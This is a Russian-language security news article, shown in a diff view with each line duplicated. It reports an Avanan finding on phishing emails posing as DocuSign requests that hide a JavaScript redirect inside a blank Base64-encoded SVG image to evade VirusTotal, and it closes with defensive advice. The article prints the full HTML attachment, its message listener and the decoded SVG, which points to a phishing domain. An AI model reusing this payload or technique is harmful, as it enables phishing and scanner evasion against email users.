0 added
0 removed
Original
2026-01-01
Modified
2026-02-21
1
<p>Исследователи из компании Avanan<a>выяснили</a>, что злоумышленники внедряют вредоносное ПО через пустые изображения в электронных письмах. Это позволяет им обходить проверку службы VirusTotal.</p>
1
<p>Исследователи из компании Avanan<a>выяснили</a>, что злоумышленники внедряют вредоносное ПО через пустые изображения в электронных письмах. Это позволяет им обходить проверку службы VirusTotal.</p>
2
<p>"Хакеры могут атаковать практически любых пользователей при помощи этого метода. Как и для многих атак, главная их идея - достать информацию от жертвы. Любой, у кого есть доступ к конфиденциальной информации или банковскому счёту, является потенциальной целью хакеров", -<a>сказал</a>Джереми Фукс, аналитик кибербезопасности из Avanan.</p>
2
<p>"Хакеры могут атаковать практически любых пользователей при помощи этого метода. Как и для многих атак, главная их идея - достать информацию от жертвы. Любой, у кого есть доступ к конфиденциальной информации или банковскому счёту, является потенциальной целью хакеров", -<a>сказал</a>Джереми Фукс, аналитик кибербезопасности из Avanan.</p>
3
<p>Хакеры отправляют жертвам письмо с вложенным документом, который связан с сервисом управления электронными документами - DocuSign. В письме говорится, что нужно просмотреть и подписать документ.</p>
3
<p>Хакеры отправляют жертвам письмо с вложенным документом, который связан с сервисом управления электронными документами - DocuSign. В письме говорится, что нужно просмотреть и подписать документ.</p>
4
Внешний вид письма, которое отправляют хакеры. Источник:<a>Avanan</a><p>По ссылке пользователь переходит на страницу DocuSign, которая является подлинной. Но опасность находится во вложенном HTM-коде, отправленном вместе со ссылкой на DocuSign. В нём содержится SVG-изображение, закодированное с использованием Base64. Само изображение пустое, но внутри себя файл имеет встроенный JavaScript-код, который перенаправляет на вредоносный URL-адрес.</p>
4
Внешний вид письма, которое отправляют хакеры. Источник:<a>Avanan</a><p>По ссылке пользователь переходит на страницу DocuSign, которая является подлинной. Но опасность находится во вложенном HTM-коде, отправленном вместе со ссылкой на DocuSign. В нём содержится SVG-изображение, закодированное с использованием Base64. Само изображение пустое, но внутри себя файл имеет встроенный JavaScript-код, который перенаправляет на вредоносный URL-адрес.</p>
5
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title> </head> <body> <embed src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48Y2lyY2xlPjwvY2lyY2xlPjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48IVtDREFUQVtwYXJlbnQud2luZG93LnBvc3RNZXNzYWdlKCJodHRwczovL2F3aW4xLmNvbS9jcmVhZC5waHA/YXdpbm1pZD0xNjMyOCZhd2luYWZmaWQ9NDIxMjI1JnVlZD1odHRwczovL25hNGRvY3VjaGVjay5uaWdodHNreS50ay8/dXNlcm5hbWU9IiwgIioiKV1dPjwvc2NyaXB0Pjwvc3ZnPg=="> <script> window.addEventListener("message", (event) => { console.log(event) if (event.data) window.location = event.data; }, false); </script> </body> </html><p>Декодированное изображение выглядит так:</p>
5
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title> </head> <body> <embed src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48Y2lyY2xlPjwvY2lyY2xlPjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48IVtDREFUQVtwYXJlbnQud2luZG93LnBvc3RNZXNzYWdlKCJodHRwczovL2F3aW4xLmNvbS9jcmVhZC5waHA/YXdpbm1pZD0xNjMyOCZhd2luYWZmaWQ9NDIxMjI1JnVlZD1odHRwczovL25hNGRvY3VjaGVjay5uaWdodHNreS50ay8/dXNlcm5hbWU9IiwgIioiKV1dPjwvc2NyaXB0Pjwvc3ZnPg=="> <script> window.addEventListener("message", (event) => { console.log(event) if (event.data) window.location = event.data; }, false); </script> </body> </html><p>Декодированное изображение выглядит так:</p>
6
<?xml version="1.0" ?> <svg xmlns="http://www.w3.org/2000/svg"> <circle></circle> <script type="text/javascript"> <![CDATA[parent.window.postMessage("https://awin1.com/cread.php?awinmid=16328&awinaffid=421225&ued=https://na4docucheck.nightsky.tk/?username=<Здесь находится имя пользователя>", "*")]]> </script> </svg><p>Таким способом хакеры могут скрывать вредоносные URL-ссылки внутри пустых изображений, чтобы обходить сервисы проверки.</p>
6
<?xml version="1.0" ?> <svg xmlns="http://www.w3.org/2000/svg"> <circle></circle> <script type="text/javascript"> <![CDATA[parent.window.postMessage("https://awin1.com/cread.php?awinmid=16328&awinaffid=421225&ued=https://na4docucheck.nightsky.tk/?username=<Здесь находится имя пользователя>", "*")]]> </script> </svg><p>Таким способом хакеры могут скрывать вредоносные URL-ссылки внутри пустых изображений, чтобы обходить сервисы проверки.</p>
7
<p>Чтобы обезопасить себя от таких атак, специалисты из сферы безопасности рекомендуют:</p>
7
<p>Чтобы обезопасить себя от таких атак, специалисты из сферы безопасности рекомендуют:</p>
8
<ul><li>не доверять электронным письмам, в которых содержатся HTML- или HTM-вложения;</li>
8
<ul><li>не доверять электронным письмам, в которых содержатся HTML- или HTM-вложения;</li>
9
<li>блокировать все сообщения с HTML-вложениями и относиться к ним так же, как к исполнительным файлам (.exe, .cab).</li>
9
<li>блокировать все сообщения с HTML-вложениями и относиться к ним так же, как к исполнительным файлам (.exe, .cab).</li>
10
</ul>
10
</ul>